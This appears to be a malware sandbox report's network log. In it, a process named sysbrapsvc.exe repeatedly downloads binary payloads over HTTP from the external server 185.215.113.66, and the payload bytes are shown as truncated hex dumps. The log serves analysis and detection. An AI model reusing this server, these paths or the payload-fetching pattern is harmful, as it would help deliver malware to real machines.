                                                                              Data Raw: 2f eb 3b ff 22 8c 9e 7e d6 fa 86 16 25 d6 a1 eb 91 96 d2 6e ab 38 67 1c 3d 47 67 87 68 ce 24 2a dd 8d 07 7d 5e 1e 53 cf 7f 9f bc 53 5d 8e 04 f4 f9 09 4a 15 22 50 da b8 68 9f b3 a6 2d c0 84 94 bb 51 1c 79 b8 aa a0 30 32 32 47 8d 6d c6 9a 54 e9 66 08 fd 3c 2e b3 c9 6e 64 08 31 1f 3f ff cb e3 5e 8e 52 06 1f cf 42 06 a5 8d 78 fa ea fd 6c 47 55 3f a1 8a 36 0c 86 c2 37 a5 0d 96 df 47 6a f5 fa 9a ed d8 93 3c 00 a3 68 3d ee 32 c5 ce 5c c0 ae a1 7a ce 06 9b c4 2e 52 b9 87 a6 d5 8b 39 3e 60 52 51 20 df b6 cc b3 c5 97 33 24 0a 47 ff 73 ac cb 3b c1 25 f9 65 a7 9c 1b 55 78 a9 8a 26 c3 ad f0 c1 e2 6f 5b 1e 78 02 51 ed a0 19 31 a4 eb 64 ee 81 19 3b bb 92 5d 6f 1c dc 69 3e 42 33 60 0f 00 c2 e7 19 a3 9d d8 cd 2d d6 f7 1a 97 fa b6 df d6 69 04 54 0b aa 9f 3e 4d 56 2f 90 eb e5 dc 5f 4d 79 f6 da af 61 e3 70 78 76 42 ab 75 81 3d 29 65 73 41 39 c5 1e 6c 94 fd 3d 7c 17 bc fa 05 70 cd 19 c0 34 4e 24 68 bb ab d4 7f 18 4f 60 99 c0 3b 20 b9 ee e7 94 7e 1a 1a fd 3b e8 a4 77 5f e0 81 37 62 a8 66 c5 b8 b7 c9 32 ef ce 1c 9b 4a e9 [TRUNCATED]
                                                                              Data Ascii: /;"~%n8g=Ggh$*}^SS]J"Ph-Qy022GmTf<.nd1?^RBxlGU?67Gj<h=2\z.R9>`RQ 3$Gs;%eUx&o[xQ1d;]oi>B3`-iT>MV/_MyapxvBu=)esA9l=|p4N$hO`; ~;w_7bf2J6%9K2!PeeQfYwIf5*9Bs:L7-lgw/nlOsk,c$Mt7=PGKN6EDy!Ig6Yt7exU]5{Yl+5ZN'"'zZ}K2~:/U~1\M^lx1M8/50>f{VG%w uVTo=?ZUc~tMto|;q{x]+^(qpmKA<qvv9'b.T/Gp_e,7os?g&|d(v[d}|Xa1jv&B7j\o|N!i/u.,o#/v]1&o3T}l{fKV_E-&!1~uZ0}_+_i|sV!B[@L;;le;fGr<i7DLP`}8y#WqO)h/E^r7QuJ0 [TRUNCATED]
                                                                              May 8, 2024 15:22:20.126723051 CEST1289INData Raw: a0 2d e3 56 4f b5 70 35 f0 87 6d 9a a1 c6 80 d4 8f 8d da 29 da 12 7f 44 65 55 c5 e5 ad 6b 7f 92 1c 16 4c 62 59 24 20 27 a1 4e a6 58 37 f1 d4 4e 3a b8 07 27 be fe 79 d2 0a 4d a3 e9 b3 d3 27 ea 71 3e 45 12 d6 e4 a1 f1 c5 ca 1e dc 0b 6b c4 4d 1d bf
                                                                              Data Ascii: -VOp5m)DeUkLbY$ 'NX7N:'yM'q>EkM2YN JemGZ%>:P@OXW9E:>;n;EK_ptl[}?/EBR -zw{k@/ETJ4CSoD7K)N&)LPl8i:^.;?D
                                                                              May 8, 2024 15:22:20.126774073 CEST1289INData Raw: 34 95 48 63 4a 56 69 1b b6 d0 11 8b 43 3d f9 9b c1 7e ce 35 63 32 b1 a5 bd a2 ce 1d 8c 3c cd 5a 8c 04 19 20 36 cc 80 30 f7 36 0b bb 1c 5d aa ca 75 b1 fb f0 12 10 c5 8d b1 6b da 5c 25 f5 99 66 3a 04 1d 9f 21 83 7b 3f 47 a0 62 23 9e 6d 75 fc 06 13
                                                                              Data Ascii: 4HcJViC=~5c2<Z 606]uk\%f:!{?Gb#mue/bE)Ac,1_zXGl}J ,AoXu=/Tx;sGP'ZECi\ogb)]>JpA7NdI&"=%}w7a
                                                                              May 8, 2024 15:22:20.126806974 CEST1289INData Raw: 22 ee 51 86 c3 82 42 12 1e 23 94 22 31 32 98 d8 93 42 06 bc 3e ab 5a 7e 1b b2 9c 93 cf ed de db 56 ff d1 9a e8 c0 a3 e2 8c 16 0b 5d 25 0a f3 39 83 b8 8e d5 dc dd 2b 93 5a e8 e1 72 b6 41 ca d0 a8 ce 28 87 51 da 7d bc 57 1f 72 5e d5 40 0c 79 f6 6c
                                                                              Data Ascii: "QB#"12B>Z~V]%9+ZrA(Q}Wr^@yl4~n~uqy7Bk0k32[XOjxLve.BivxU8Qj-S,& fV?X#4J#< ^e\':l}btB
                                                                              May 8, 2024 15:22:20.126821041 CEST1289INData Raw: 14 17 af 0e 52 15 bc 73 cd 28 6c 9d fe 63 14 1c 81 15 ba ea f5 f5 b7 18 2c 57 40 8e 55 0c 7a 93 9e 99 9a 75 58 fb 01 95 7d 90 03 43 86 04 d7 af c7 1e 33 a6 17 c0 a6 8c 9d 26 ea af 5b e0 69 e8 2c 10 54 6a b6 4d be 13 63 30 f7 27 ee 68 6a 25 06 d1
                                                                              Data Ascii: Rs(lc,W@UzuX}C3&[i,TjMc0'hj%M>V*w=dfcwo$/n7.^Kfy37Iz[VZLF|%|s79\"%pNl\Rk-</'HQB14.k-!B>1lZ0_
                                                                              May 8, 2024 15:22:20.126892090 CEST1289INData Raw: 35 03 c6 69 a0 71 ee 00 0e a5 c7 7d 33 36 84 19 87 ec 1d 2d 6e 04 a5 fc 51 32 b5 18 97 f4 6e b2 82 9a bc 7e 2e b5 ce 63 92 99 20 a2 65 9f af 42 2a c0 06 b2 b1 5f 51 05 f2 20 e9 91 74 c6 3b 6d f0 ef ad 0c 15 65 45 32 52 e2 3e b3 a4 99 bd da e9 96
                                                                              Data Ascii: 5iq}36-nQ2n~.c eB*_Q t;meE2R>*pLyFU+:&1:PQB\?rumgqeP</;IzfMY;H,bmj{dVT2}-^ZY4]/eVI#/ z?_hX*w
                                                                              May 8, 2024 15:22:20.126908064 CEST1289INData Raw: d8 48 56 8b 5a b8 ab 63 32 07 0b 67 c9 9d d3 d0 75 09 e8 eb e5 85 2b b1 4b 64 12 fb 9c e5 a1 9e 3e 41 f0 08 2b 61 3b be 1e ef f1 0f 7b ff 90 28 db 02 fd 0f f0 e6 ec 08 87 94 5a 41 43 69 77 86 7b 79 28 5c 46 19 4a c0 d4 50 6f 9b 01 a5 ae 12 8d b2
                                                                              Data Ascii: HVZc2gu+Kd>A+a;{(ZACiw{y(\FJPoc,}-$g.j<+aoeO2(SL=[9HB8[s]YA1A/:FE0xJxUX>IWDWa5PH4(ho%q$qp
                                                                              May 8, 2024 15:22:20.126931906 CEST1289INData Raw: 09 b8 2f 79 14 9d ef 6d 09 77 e2 b2 60 84 e0 9b 45 3b 28 02 15 15 9d ee 50 b6 f6 a2 b9 1c 76 7f f6 8e c3 38 89 c2 df 40 2c 53 36 cd b3 d6 ff 35 7b 9a 79 01 e8 17 61 73 47 03 e2 a4 42 20 5c d3 65 07 0a a3 2b f7 e1 65 81 c9 7e 21 47 71 a8 a8 b3 a3
                                                                              Data Ascii: /ymw`E;(Pv8@,S65{yasGB \e+e~!GqKw;)+UXd4lseiezy}(<vaSf>_$eRiZ(,MyrL?BtwUYPwTV/cPUfJcrd
                                                                              May 8, 2024 15:22:20.126945972 CEST1289INData Raw: 38 90 ee eb 04 9b f4 3f 3f 31 b6 f4 34 59 eb 6f 0d 53 13 67 d4 a1 dd c3 95 f8 9d 11 aa 8d 8a b2 7f b6 e2 78 a8 ff 57 39 a8 95 52 70 35 c8 b2 cf 61 5e 07 6e c8 61 4d 84 b3 92 7e 9e 09 75 d9 93 53 13 9b ee 06 d3 75 48 e5 df e6 d0 96 53 bb de 81 4a
                                                                              Data Ascii: 8??14YoSgxW9Rp5a^naM~uSuHSJD>K4!o=zxNE:Mpy?WoQ!vP8K(9G(q>.(#7W}UQ.f~MaQz\ztY7Z0}R]O$\"TjEqjZ_
                                                                              May 8, 2024 15:22:20.127024889 CEST1289INData Raw: 3e b9 6e 66 f4 fb b3 e5 57 91 84 03 4d 3c 75 8e d7 b8 2f 54 26 be a9 d1 85 0b 7e d0 0a 77 d7 05 f5 56 ae ed ef 4e de 31 b6 25 1c e8 ca be e4 f9 b8 c4 c6 5f d6 09 b9 e9 43 fa 6f 7e 6e 7e b7 96 64 d5 3c 37 b6 f3 c8 ac fe 60 12 77 27 ea 10 ec 4a 1f
                                                                              Data Ascii: >nfWM<u/T&~wVN1%_Co~n~d<7`w'JCyKx-WO)fZ<eSz1WZoE2}-S:O:yQzt{Dx/Y0_eP#81n]FaBZx4hY4PE~Z#/kdXf
                                                                              May 8, 2024 15:22:20.467386007 CEST1289INData Raw: 8b b3 71 d9 c8 da 74 f5 6d 13 ab 82 5f 0f d7 2a 75 8b dd 33 63 1c b2 7d 94 1e 26 53 ac e2 1f 13 96 62 30 be f6 91 83 88 02 53 ab 64 26 46 78 9c 5f 55 53 4e e7 85 20 bf 19 62 c8 f4 73 7a 7b f7 95 a5 e0 a7 b3 5f af 93 4b f8 e5 09 51 e9 cb 5b 41 72
                                                                              Data Ascii: qtm_*u3c}&Sb0Sd&Fx_USN bsz{_KQ[Ary#<Fc)aH|!9**kjj?1~_Lc_>c\{LY#w^1d1?2jl&.ln)(An%e{Bj<q=+nG)=W


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.849710185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:22:21.481426001 CEST166OUTGET /1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:21.823957920 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:21 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 101120
                                                                              Last-Modified: Mon, 06 May 2024 15:20:46 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638f54e-18b00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 2f eb 3b ff 22 8c 9e 7e d6 fa 86 16 25 d6 a1 eb 91 96 d2 6e ab 38 67 1c 3d 47 67 87 68 ce 24 2a dd 8d 07 7d 5e 1e 53 cf 7f 9f bc 53 5d 8e 04 f4 f9 09 4a 15 22 50 da b8 68 9f b3 a6 2d c0 84 94 bb 51 1c 79 b8 aa a0 30 32 32 47 8d 6d c6 9a 54 e9 66 08 fd 3c 2e b3 c9 6e 64 08 31 1f 3f ff cb e3 5e 8e 52 06 1f cf 42 06 a5 8d 78 fa ea fd 6c 47 55 3f a1 8a 36 0c 86 c2 37 a5 0d 96 df 47 6a f5 fa 9a ed d8 93 3c 00 a3 68 3d ee 32 c5 ce 5c c0 ae a1 7a ce 06 9b c4 2e 52 b9 87 a6 d5 8b 39 3e 60 52 51 20 df b6 cc b3 c5 97 33 24 0a 47 ff 73 ac cb 3b c1 25 f9 65 a7 9c 1b 55 78 a9 8a 26 c3 ad f0 c1 e2 6f 5b 1e 78 02 51 ed a0 19 31 a4 eb 64 ee 81 19 3b bb 92 5d 6f 1c dc 69 3e 42 33 60 0f 00 c2 e7 19 a3 9d d8 cd 2d d6 f7 1a 97 fa b6 df d6 69 04 54 0b aa 9f 3e 4d 56 2f 90 eb e5 dc 5f 4d 79 f6 da af 61 e3 70 78 76 42 ab 75 81 3d 29 65 73 41 39 c5 1e 6c 94 fd 3d 7c 17 bc fa 05 70 cd 19 c0 34 4e 24 68 bb ab d4 7f 18 4f 60 99 c0 3b 20 b9 ee e7 94 7e 1a 1a fd 3b e8 a4 77 5f e0 81 37 62 a8 66 c5 b8 b7 c9 32 ef ce 1c 9b 4a e9 [TRUNCATED]
                                                                              Data Ascii: /;"~%n8g=Ggh$*}^SS]J"Ph-Qy022GmTf<.nd1?^RBxlGU?67Gj<h=2\z.R9>`RQ 3$Gs;%eUx&o[xQ1d;]oi>B3`-iT>MV/_MyapxvBu=)esA9l=|p4N$hO`; ~;w_7bf2J6%9K2!PeeQfYwIf5*9Bs:L7-lgw/nlOsk,c$Mt7=PGKN6EDy!Ig6Yt7exU]5{Yl+5ZN'"'zZ}K2~:/U~1\M^lx1M8/50>f{VG%w uVTo=?ZUc~tMto|;q{x]+^(qpmKA<qvv9'b.T/Gp_e,7os?g&|d(v[d}|Xa1jv&B7j\o|N!i/u.,o#/v]1&o3T}l{fKV_E-&!1~uZ0}_+_i|sV!B[@L;;le;fGr<i7DLP`}8y#WqO)h/E^r7QuJ0 [TRUNCATED]
                                                                              May 8, 2024 15:22:21.824067116 CEST1289INData Raw: a0 2d e3 56 4f b5 70 35 f0 87 6d 9a a1 c6 80 d4 8f 8d da 29 da 12 7f 44 65 55 c5 e5 ad 6b 7f 92 1c 16 4c 62 59 24 20 27 a1 4e a6 58 37 f1 d4 4e 3a b8 07 27 be fe 79 d2 0a 4d a3 e9 b3 d3 27 ea 71 3e 45 12 d6 e4 a1 f1 c5 ca 1e dc 0b 6b c4 4d 1d bf
                                                                              Data Ascii: -VOp5m)DeUkLbY$ 'NX7N:'yM'q>EkM2YN JemGZ%>:P@OXW9E:>;n;EK_ptl[}?/EBR -zw{k@/ETJ4CSoD7K)N&)LPl8i:^.;?D
                                                                              May 8, 2024 15:22:21.824081898 CEST1289INData Raw: 34 95 48 63 4a 56 69 1b b6 d0 11 8b 43 3d f9 9b c1 7e ce 35 63 32 b1 a5 bd a2 ce 1d 8c 3c cd 5a 8c 04 19 20 36 cc 80 30 f7 36 0b bb 1c 5d aa ca 75 b1 fb f0 12 10 c5 8d b1 6b da 5c 25 f5 99 66 3a 04 1d 9f 21 83 7b 3f 47 a0 62 23 9e 6d 75 fc 06 13
                                                                              Data Ascii: 4HcJViC=~5c2<Z 606]uk\%f:!{?Gb#mue/bE)Ac,1_zXGl}J ,AoXu=/Tx;sGP'ZECi\ogb)]>JpA7NdI&"=%}w7a
                                                                              May 8, 2024 15:22:21.824238062 CEST1289INData Raw: 22 ee 51 86 c3 82 42 12 1e 23 94 22 31 32 98 d8 93 42 06 bc 3e ab 5a 7e 1b b2 9c 93 cf ed de db 56 ff d1 9a e8 c0 a3 e2 8c 16 0b 5d 25 0a f3 39 83 b8 8e d5 dc dd 2b 93 5a e8 e1 72 b6 41 ca d0 a8 ce 28 87 51 da 7d bc 57 1f 72 5e d5 40 0c 79 f6 6c
                                                                              Data Ascii: "QB#"12B>Z~V]%9+ZrA(Q}Wr^@yl4~n~uqy7Bk0k32[XOjxLve.BivxU8Qj-S,& fV?X#4J#< ^e\':l}btB
                                                                              May 8, 2024 15:22:21.824251890 CEST1289INData Raw: 14 17 af 0e 52 15 bc 73 cd 28 6c 9d fe 63 14 1c 81 15 ba ea f5 f5 b7 18 2c 57 40 8e 55 0c 7a 93 9e 99 9a 75 58 fb 01 95 7d 90 03 43 86 04 d7 af c7 1e 33 a6 17 c0 a6 8c 9d 26 ea af 5b e0 69 e8 2c 10 54 6a b6 4d be 13 63 30 f7 27 ee 68 6a 25 06 d1
                                                                              Data Ascii: Rs(lc,W@UzuX}C3&[i,TjMc0'hj%M>V*w=dfcwo$/n7.^Kfy37Iz[VZLF|%|s79\"%pNl\Rk-</'HQB14.k-!B>1lZ0_
                                                                              May 8, 2024 15:22:21.824265957 CEST1289INData Raw: 35 03 c6 69 a0 71 ee 00 0e a5 c7 7d 33 36 84 19 87 ec 1d 2d 6e 04 a5 fc 51 32 b5 18 97 f4 6e b2 82 9a bc 7e 2e b5 ce 63 92 99 20 a2 65 9f af 42 2a c0 06 b2 b1 5f 51 05 f2 20 e9 91 74 c6 3b 6d f0 ef ad 0c 15 65 45 32 52 e2 3e b3 a4 99 bd da e9 96
                                                                              Data Ascii: 5iq}36-nQ2n~.c eB*_Q t;meE2R>*pLyFU+:&1:PQB\?rumgqeP</;IzfMY;H,bmj{dVT2}-^ZY4]/eVI#/ z?_hX*w
                                                                              May 8, 2024 15:22:21.824280977 CEST1289INData Raw: d8 48 56 8b 5a b8 ab 63 32 07 0b 67 c9 9d d3 d0 75 09 e8 eb e5 85 2b b1 4b 64 12 fb 9c e5 a1 9e 3e 41 f0 08 2b 61 3b be 1e ef f1 0f 7b ff 90 28 db 02 fd 0f f0 e6 ec 08 87 94 5a 41 43 69 77 86 7b 79 28 5c 46 19 4a c0 d4 50 6f 9b 01 a5 ae 12 8d b2
                                                                              Data Ascii: HVZc2gu+Kd>A+a;{(ZACiw{y(\FJPoc,}-$g.j<+aoeO2(SL=[9HB8[s]YA1A/:FE0xJxUX>IWDWa5PH4(ho%q$qp
                                                                              May 8, 2024 15:22:21.824366093 CEST1289INData Raw: 09 b8 2f 79 14 9d ef 6d 09 77 e2 b2 60 84 e0 9b 45 3b 28 02 15 15 9d ee 50 b6 f6 a2 b9 1c 76 7f f6 8e c3 38 89 c2 df 40 2c 53 36 cd b3 d6 ff 35 7b 9a 79 01 e8 17 61 73 47 03 e2 a4 42 20 5c d3 65 07 0a a3 2b f7 e1 65 81 c9 7e 21 47 71 a8 a8 b3 a3
                                                                              Data Ascii: /ymw`E;(Pv8@,S65{yasGB \e+e~!GqKw;)+UXd4lseiezy}(<vaSf>_$eRiZ(,MyrL?BtwUYPwTV/cPUfJcrd
                                                                              May 8, 2024 15:22:21.824378967 CEST1289INData Raw: 38 90 ee eb 04 9b f4 3f 3f 31 b6 f4 34 59 eb 6f 0d 53 13 67 d4 a1 dd c3 95 f8 9d 11 aa 8d 8a b2 7f b6 e2 78 a8 ff 57 39 a8 95 52 70 35 c8 b2 cf 61 5e 07 6e c8 61 4d 84 b3 92 7e 9e 09 75 d9 93 53 13 9b ee 06 d3 75 48 e5 df e6 d0 96 53 bb de 81 4a
                                                                              Data Ascii: 8??14YoSgxW9Rp5a^naM~uSuHSJD>K4!o=zxNE:Mpy?WoQ!vP8K(9G(q>.(#7W}UQ.f~MaQz\ztY7Z0}R]O$\"TjEqjZ_
                                                                              May 8, 2024 15:22:21.824436903 CEST1289INData Raw: 3e b9 6e 66 f4 fb b3 e5 57 91 84 03 4d 3c 75 8e d7 b8 2f 54 26 be a9 d1 85 0b 7e d0 0a 77 d7 05 f5 56 ae ed ef 4e de 31 b6 25 1c e8 ca be e4 f9 b8 c4 c6 5f d6 09 b9 e9 43 fa 6f 7e 6e 7e b7 96 64 d5 3c 37 b6 f3 c8 ac fe 60 12 77 27 ea 10 ec 4a 1f
                                                                              Data Ascii: >nfWM<u/T&~wVN1%_Co~n~d<7`w'JCyKx-WO)fZ<eSz1WZoE2}-S:O:yQzt{Dx/Y0_eP#81n]FaBZx4hY4PE~Z#/kdXf
                                                                              May 8, 2024 15:22:22.169785023 CEST1289INData Raw: 8b b3 71 d9 c8 da 74 f5 6d 13 ab 82 5f 0f d7 2a 75 8b dd 33 63 1c b2 7d 94 1e 26 53 ac e2 1f 13 96 62 30 be f6 91 83 88 02 53 ab 64 26 46 78 9c 5f 55 53 4e e7 85 20 bf 19 62 c8 f4 73 7a 7b f7 95 a5 e0 a7 b3 5f af 93 4b f8 e5 09 51 e9 cb 5b 41 72
                                                                              Data Ascii: qtm_*u3c}&Sb0Sd&Fx_USN bsz{_KQ[Ary#<Fc)aH|!9**kjj?1~_Lc_>c\{LY#w^1d1?2jl&.ln)(An%e{Bj<q=+nG)=W
                                                                              May 8, 2024 15:22:29.232702017 CEST166OUTGET /2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:33.659881115 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:33 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 15104
                                                                              Last-Modified: Wed, 24 Apr 2024 23:21:57 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "66299415-3b00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4b e8 23 1d 0c 94 79 42 1c 1c 48 97 49 7a 96 f6 a9 d0 37 98 4e 18 a4 bf cd f5 ce 8d 00 4d 6c f6 9f 43 ea c4 50 f3 99 cb 6f 7f 29 ac 33 c1 1e 12 8e 34 8d 95 a7 ea 7c 62 91 62 10 61 f3 ab d4 6a b1 0a 3d 8c 22 70 e0 78 c2 05 ad 0c 8b 93 0b 61 d5 48 27 b5 a2 b1 76 88 94 ff 6e a7 e9 f4 c7 c3 48 3f d7 cf bd f1 a2 8e e1 3f ec 46 4f c8 b8 9d ea b3 ae d7 87 06 73 47 a9 ac 62 e9 fd b0 18 6e 84 ec 0c cc 82 c3 0f 82 5b 02 ec 9d e4 64 88 4f 2c 46 10 a4 dd 63 b7 a7 cf 5a b0 db fe 14 f8 fc 55 50 cc 7c 1d 98 b3 60 c0 ab 71 f8 25 3c 61 53 64 a0 d3 ce 2f 05 a7 f8 76 5a 2c 96 b3 67 78 59 67 17 11 7c b1 fe e0 a8 92 e8 4c 1f 74 26 fa 7b a2 02 92 bd ec 3d 08 ec f4 72 ef a3 d5 25 9e 4d 8d f4 d4 47 a5 08 6f c7 c5 f9 ab c6 e4 bc 48 81 e4 5d 23 c3 79 7c 8c fc ca 58 d2 4c 8c 18 bd e7 fe 22 4a b2 30 ad 4c 30 bd 90 e0 18 d2 77 c0 4a b1 c5 9d 03 c5 97 f3 e7 2d 46 d9 ae 13 86 5f 69 ce 8e 09 a4 95 a5 45 bb 82 e4 74 81 eb d2 3a a2 a1 37 25 c3 bc bd 85 b2 3c 84 47 5f 0e a3 fc ac d5 4b 82 de 1e ec fd 0e df 86 a8 6e 37 43 21 0d cf 8d [TRUNCATED]
                                                                              Data Ascii: K#yBHIz7NMlCPo)34|bbaj="pxaH'vnH??FOsGbn[dO,FcZUP|`q%<aSd/vZ,gxYg|Lt&{=r%MGoH]#y|XL"J0L0wJ-F_iEt:7%<G_Kn7C!XY={GRsw!0l0[!^irP:X$B(<:&axtQL[y<1:8cJi{Cw)Vx&`[gFkW?*(5pnH$~vL%i_oZ4S*~R6.0i[y ?JD!sn9a:z^Ee'4G~*ULV*<`9o8X'.63dd4kiZY!IvK<iH6HmMU>}L&0d{R!A7RZi(";b%Y.0#J2@Bs:g@h{^G<[Y/x6s*eZ8etZ=N.O`-,STepH7[:wf4kE5)Mm{:<tW;?U`y.E*0nk(D}=OLX9i,,a~pYZA/ qD_T.> [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.849712185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:22:35.021296024 CEST166OUTGET /2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:35.386194944 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:35 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 15104
                                                                              Last-Modified: Wed, 24 Apr 2024 23:21:57 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "66299415-3b00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4b e8 23 1d 0c 94 79 42 1c 1c 48 97 49 7a 96 f6 a9 d0 37 98 4e 18 a4 bf cd f5 ce 8d 00 4d 6c f6 9f 43 ea c4 50 f3 99 cb 6f 7f 29 ac 33 c1 1e 12 8e 34 8d 95 a7 ea 7c 62 91 62 10 61 f3 ab d4 6a b1 0a 3d 8c 22 70 e0 78 c2 05 ad 0c 8b 93 0b 61 d5 48 27 b5 a2 b1 76 88 94 ff 6e a7 e9 f4 c7 c3 48 3f d7 cf bd f1 a2 8e e1 3f ec 46 4f c8 b8 9d ea b3 ae d7 87 06 73 47 a9 ac 62 e9 fd b0 18 6e 84 ec 0c cc 82 c3 0f 82 5b 02 ec 9d e4 64 88 4f 2c 46 10 a4 dd 63 b7 a7 cf 5a b0 db fe 14 f8 fc 55 50 cc 7c 1d 98 b3 60 c0 ab 71 f8 25 3c 61 53 64 a0 d3 ce 2f 05 a7 f8 76 5a 2c 96 b3 67 78 59 67 17 11 7c b1 fe e0 a8 92 e8 4c 1f 74 26 fa 7b a2 02 92 bd ec 3d 08 ec f4 72 ef a3 d5 25 9e 4d 8d f4 d4 47 a5 08 6f c7 c5 f9 ab c6 e4 bc 48 81 e4 5d 23 c3 79 7c 8c fc ca 58 d2 4c 8c 18 bd e7 fe 22 4a b2 30 ad 4c 30 bd 90 e0 18 d2 77 c0 4a b1 c5 9d 03 c5 97 f3 e7 2d 46 d9 ae 13 86 5f 69 ce 8e 09 a4 95 a5 45 bb 82 e4 74 81 eb d2 3a a2 a1 37 25 c3 bc bd 85 b2 3c 84 47 5f 0e a3 fc ac d5 4b 82 de 1e ec fd 0e df 86 a8 6e 37 43 21 0d cf 8d [TRUNCATED]
                                                                              Data Ascii: K#yBHIz7NMlCPo)34|bbaj="pxaH'vnH??FOsGbn[dO,FcZUP|`q%<aSd/vZ,gxYg|Lt&{=r%MGoH]#y|XL"J0L0wJ-F_iEt:7%<G_Kn7C!XY={GRsw!0l0[!^irP:X$B(<:&axtQL[y<1:8cJi{Cw)Vx&`[gFkW?*(5pnH$~vL%i_oZ4S*~R6.0i[y ?JD!sn9a:z^Ee'4G~*ULV*<`9o8X'.63dd4kiZY!IvK<iH6HmMU>}L&0d{R!A7RZi(";b%Y.0#J2@Bs:g@h{^G<[Y/x6s*eZ8etZ=N.O`-,STepH7[:wf4kE5)Mm{:<tW;?U`y.E*0nk(D}=OLX9i,,a~pYZA/ qD_T.> [TRUNCATED]
                                                                              May 8, 2024 15:22:35.386343956 CEST1289INData Raw: b9 ec 48 5b bc 5c c5 cc 74 49 24 c8 79 28 87 7d 84 00 80 4b 76 48 a4 b5 c0 ff 47 f3 67 e3 7b 80 0f 8a 5f 14 81 b8 50 87 65 ef 85 cb 83 a1 8e f8 3c 60 82 4a 42 41 ed f5 9c d7 f1 6d 7a f0 c4 f6 40 ab 1b b9 0b a9 9f 8f 86 18 c8 d5 0d da 24 be 61 cd
                                                                              Data Ascii: H[\tI$y(}KvHGg{_Pe<`JBAmz@$a3/rB"SGAiD5#kK3"ZKD*6O(!nYA@2o<~&$PeX9As_q|0GRl'fB3CxjHgxQ|
                                                                              May 8, 2024 15:22:35.386382103 CEST1289INData Raw: 45 42 8e 2f e3 a5 18 82 da 03 3a a4 b5 2d a1 cc 37 03 69 95 7d 8f 7b 54 01 71 8e c4 3c 1f 9c 2b ad 07 75 d3 bc 03 00 7d 31 8d c5 42 72 2d 6e 86 18 0e 56 a1 80 c2 b6 5e de 4b 38 06 74 de 9d 2e 9f 49 8a 79 ba 55 46 49 9b d6 40 be 1d a1 f4 bd 0f 33
                                                                              Data Ascii: EB/:-7i}{Tq<+u}1Br-nV^K8t.IyUFI@39^+8"B;cr+=T]*:~uf+]tg]}>F.ez_4:6Mt9Lm`9xtIqMf@&/|F"PM__SEy`f'`.,c#%
                                                                              May 8, 2024 15:22:35.386398077 CEST1289INData Raw: da 8a 40 49 4a f5 3a 1a df 96 c3 5f 0b 5a fc fe 03 4c f2 79 5f f5 de 80 39 49 a1 18 82 83 a3 40 51 3b 3c fe 6c 6c 94 0c b1 5b bc 8b ed d1 7c 5e c4 2e 4e 83 35 ee 93 1e 6d f3 28 c0 26 4d 8e 20 52 43 de 37 80 2d 91 55 16 b0 af ab 19 02 2f 81 e9 0b
                                                                              Data Ascii: @IJ:_ZLy_9I@Q;<ll[|^.N5m(&M RC7-U/VgtXt@*<d5Y*K9G_2T.DsTzyH9H<">e6G{R9NzGGtjLT?+&5Ovx[~UY2&Q'de+RB
                                                                              May 8, 2024 15:22:35.386580944 CEST1289INData Raw: 01 e6 18 ad 0b 22 41 6b 9e 7f 93 1a ff da a3 28 22 08 4f 91 02 a2 0e 21 66 5b a8 47 fe a7 74 30 ea 1c 20 8a e3 83 e5 7a 80 18 1d cc 7e 49 21 86 2a 3c 44 43 ea fd 59 98 ca e1 d0 8f b5 75 78 82 8a e2 00 e7 c3 4f c9 1d f5 00 9e 8f 84 bb b8 d7 09 78
                                                                              Data Ascii: "Ak("O!f[Gt0 z~I!*<DCYuxOx+raM"/t|^0R)P?r\4=fPv59B?CYfFD9BXP?f=.<b9zjQ]N@0~wz)<;Nxh]lZxAA
                                                                              May 8, 2024 15:22:35.386668921 CEST1289INData Raw: 04 9d 4a 4c 14 24 26 c4 de 87 af 70 f7 9a db c5 37 e1 99 d6 4d 49 6e 3c ca 13 32 ce 4f c8 3d cf 9c 75 f7 39 33 ae d0 e9 2e c3 c1 27 ec 8c 48 eb bc fa 18 f5 35 d4 8d 03 53 8f b5 de 92 1f 06 92 3e 7e 86 5d b9 d8 56 a2 d8 bb 5b a8 f8 24 7c e8 af 89
                                                                              Data Ascii: JL$&p7MIn<2O=u93.'H5S>~]V[$|lHU\9UT4,pE.>xUP]&[M8umLoyUv!n<oQ(qsOLTrEkoQ6["xYN*o]82[[]hQk
